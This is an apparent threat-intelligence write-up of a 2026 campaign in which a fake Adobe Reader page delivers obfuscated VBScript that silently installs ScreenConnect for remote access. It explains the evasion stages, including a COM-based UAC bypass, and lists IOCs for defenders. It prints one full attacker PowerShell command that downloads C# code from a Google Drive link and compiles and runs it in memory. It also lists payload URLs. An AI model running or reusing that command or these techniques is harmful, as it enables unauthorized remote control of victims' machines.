In February 2026, researchers observed an attack that begins with a fake download page impersonating Adobe Acrobat Reader. Victims are tricked into downloading a malicious script disguised as an installer.
The ultimate goal? Deploy ScreenConnect, a legitimate remote monitoring and management (RMM) tool, for unauthorized access.
What makes this campaign dangerous is not just the payload—but the stealthy delivery and execution techniques used throughout.
Stage 1: The Deceptive Lure
The attack begins with a fake website mimicking Adobe’s official download page. Once a victim visits the page:
- A file named
Acrobat_Reader_V112_6971.vbsis automatically downloaded - The file is heavily obfuscated
- It acts as the initial loader for the attack chain
This social engineering tactic leverages user trust in widely used software, increasing the likelihood of execution.
Stage 2: Obfuscated VBScript Loader
The downloaded VBScript is designed to evade detection and analysis:
- Uses dynamic string reconstruction via
Replace()functions - Avoids cleartext references like
WScript.Shell - Builds commands using
Chr()with arithmetic expressions - Executes payload silently in the background
This level of obfuscation makes static analysis extremely difficult, especially for traditional antivirus engines.
Stage 3: PowerShell as a Staging Mechanism
The VBScript launches a PowerShell command with execution policy bypass:
- Creates a temporary directory
- Downloads a file from Google Drive
- Reads the file into memory
- Compiles it using
Add-Type
This “fileless” approach significantly reduces forensic artifacts and bypasses signature-based detection.
powershell.exe -ExecutionPolicy Bypass -command ""New-Item -ItemType Directory -Path 'C:\Windows\Temp' -Force | Out-Null; curl.exe -L 'https://drive.google[.]com/uc?id=1TVJir-OlNZrLjm5FyBMk_hDjG9BV1zCy&export=download' -o 'C:\Windows\Temp\FileR.txt';Start-Sleep -Seconds 8;$source = [System.IO.File]::ReadAllText('C:\Windows\Temp\FileR.txt');Start-Sleep -Seconds 1;Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $source -Language CSharp; [HelloWorld]::SayHello()""Stage 4: In-Memory .NET Execution
The downloaded content contains C# code that:
- Embeds a malicious .NET assembly inside a byte array
- Uses reflection (
Assembly.Load) to execute it - Dynamically reconstructs method names like:
"Lo"+"ad"instead of"Load""Ent"+"ryPo"+"int"instead of"EntryPoint"
This prevents pattern-based detection and frustrates reverse engineering.
Stage 5: Advanced Evasion Techniques
1. PEB Manipulation (Process Masquerading)
The malware modifies the Process Environment Block (PEB) to:
- Change process name and path
- Masquerade as legitimate Windows binaries (e.g.,
winhlp32.exe)
This allows it to blend into normal system activity and evade EDR tools.
2. Native API Usage
Instead of standard APIs like VirtualAlloc, it uses:
NtAllocateVirtualMemoryfromntdll.dll
Why this matters:
- Reduces exposure to user-mode hooks
- Avoids security monitoring triggers
3. Shellcode Injection
- Allocates executable memory
- Injects shellcode
- Executes it to retrieve system structures like the PEB
This is a classic low-level evasion technique adapted for modern attacks.
Stage 6: UAC Bypass via COM Objects
The attack abuses Windows’ auto-elevated COM objects:
- Constructs a reversed elevation moniker
- Uses
CoGetObjectto request elevated privileges - Gains admin-level execution without user prompts
This bypasses User Account Control (UAC) silently—one of the most dangerous aspects of the chain.
Stage 7: Final Payload – ScreenConnect Deployment
In the final stage:
- A PowerShell command downloads a
.msiinstaller - Executes it using
msiexec - Installs ScreenConnect silently
Once installed, attackers gain:
- Persistent remote access
- Full system control
- Ability to move laterally or deploy additional malware
Indicators Of Compromise (IOCs)
| Indicator | Type |
|---|---|
| E4B594A18FC2A6EE164A76BDEA980BC0 | VBS |
| 07720d8220abc066b6fdb2c187ae58f5 | VBS |
| c36910c4c8d23ec93f6ae7d7a2496ce5 | VBS |
| 3EFFADB977EDDD4C48C7850C8DC03B13 | C# code with .NET assembly |
| 07F95FF34FB330875D80AFADCA3F0D5B | C# code with .NET assembly |
| A7E5DBEC37C8F431D175DFD9352DB59F | C# code with .NET assembly |
| C02448E016B2568173DE3EEDADD80149 | EXE |
| 3D389886E95F00FADE1EEA67A6C370D1 | MSI |
| eshareflies[.]im/ad/ | Fraudulent page URL |
| https://x0[.]at/qOfN.msi | ScreenConnect installer download |
| drive.google[.]com/uc?id=1TVJir-OlNZrLjm5FyBMk_hDjG9BV1zCy&export=downloadcccccdcjeegrekhllfijllutvbrrcifehuenfirtelit | TXT download |
| drive.google[.]com/uc?id=1pyyQRpUmH0YtPG-VqvMNzKUo9i8-RZ7L&export=download | TXT download |
| drive.google[.]com/uc?id=1xuJR29UP5VcY6Nvwc7TDtt7fmcGGqIVc&export=download | TXT download |
Our Opinion on This Case
This attack chain highlights a growing and concerning trend in cybersecurity: the weaponization of legitimate tools combined with advanced in-memory execution techniques. Instead of relying on traditional malware binaries, attackers are increasingly leveraging trusted software like ScreenConnect to blend into enterprise environments. This makes detection significantly harder, especially for organizations that rely heavily on allowlists or trust-based execution policies.
What stands out most is the layered evasion strategy. From VBScript obfuscation to .NET reflection and PEB manipulation, every stage is designed to reduce visibility. This indicates a high level of sophistication and planning. It is no longer enough to rely on antivirus solutions alone—behavioral detection and memory analysis are becoming essential.
Additionally, the abuse of auto-elevated COM objects to bypass UAC without user interaction is particularly alarming. It shows how attackers are exploiting legitimate Windows features rather than vulnerabilities, making patch-based defenses less effective.
In our view, organizations must shift toward a zero-trust mindset. Monitoring PowerShell activity, restricting script execution, and implementing EDR solutions with strong behavioral analytics are critical. User awareness also remains vital—because even the most advanced attack still begins with a simple click on a fake download.
